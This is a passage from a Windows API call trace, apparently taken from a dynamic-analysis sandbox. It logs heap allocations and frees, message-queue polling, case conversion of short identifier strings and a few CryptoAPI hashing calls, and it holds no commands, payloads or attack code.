Flags=0x0, Size=0x10) returned 0x24aa128 [0207.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0207.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0207.526] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.526] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.526] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0207.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0207.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0207.526] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.526] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0207.527] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0207.527] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0207.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0207.527] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0207.528] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.528] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0207.528] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.528] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.528] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0207.528] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0207.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0207.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0207.528] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.528] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0207.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0207.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0207.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0207.529] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.529] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.529] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0207.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0207.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0207.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0207.529] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0207.529] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0207.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0207.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0207.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0207.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0207.530] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0207.530] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.530] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0207.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0207.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0207.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0207.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0207.530] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0207.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0207.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0207.530] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0207.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0207.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0207.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0207.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0207.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0207.531] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0207.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0207.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0207.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0207.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0207.531] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.531] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0207.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0207.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0207.532] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0207.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0207.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0207.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0207.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0207.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0207.532] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0207.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0207.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0207.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0207.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0207.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0207.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0207.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0207.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0207.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0207.533] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0207.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0207.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0207.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0207.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0207.533] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0207.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0207.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0207.534] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.534] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0207.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0207.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0207.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0207.534] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.534] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.534] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0207.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0207.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0207.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0207.534] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0207.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0207.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0207.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0207.535] CryptHashData (hHash=0xaa5860, pbData=0x24b18a8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0207.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0207.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0207.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0207.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0207.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0207.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0207.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0207.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0207.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0207.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0207.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0207.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0207.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0207.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0207.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0207.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0207.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0207.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0207.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0207.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0207.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0207.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0207.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0207.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0207.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0207.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0207.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0207.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0207.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0207.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0207.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0207.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0207.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0207.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0207.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0207.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0207.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0207.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0207.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0207.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0207.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 